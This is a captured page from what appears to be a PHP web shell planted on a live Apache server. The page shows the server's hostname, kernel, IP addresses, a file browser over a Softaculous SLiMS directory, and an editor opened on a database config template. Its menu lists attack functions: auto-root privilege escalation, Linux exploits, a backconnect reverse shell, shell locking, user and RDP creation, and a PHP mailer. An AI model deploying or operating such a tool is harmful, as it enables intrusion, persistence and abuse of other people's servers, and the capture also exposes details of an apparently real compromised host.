Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
slims /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
changelog.txt
5.87
KB
-rw-r--r--
clone.php
5.07
KB
-rw-r--r--
database.php
916
B
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
env.php
921
B
-rw-r--r--
extend.php
8.78
KB
-rw-r--r--
fileindex.php
393
B
-rw-r--r--
import.php
3.74
KB
-rw-r--r--
info.xml
3.74
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.82
KB
-rw-r--r--
install.xml
1.38
KB
-rw-r--r--
md5
1.51
KB
-rw-r--r--
notes.txt
480
B
-rw-r--r--
update_pass.php
257
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php return [ /** * Default database node profile */ 'default_profile' => 'SLiMS', /** * SLiMS as Service, One SLiMS for many library * ---------------------------------------------------- * * Switching database node access based on rule, * such as domain, ip, port etc * * How to : * 1. make file with name database_proxy.php in config/ * 2. make your own rule in that file. * 3. change this value to true */ 'proxy' => false, /** * Nodes profile */ 'nodes' => [ 'SLiMS' => [ 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'port' => 3306, 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'options' => [ 'storage_engine' => 'MyISAM' ] ], // add more here ] ];
Close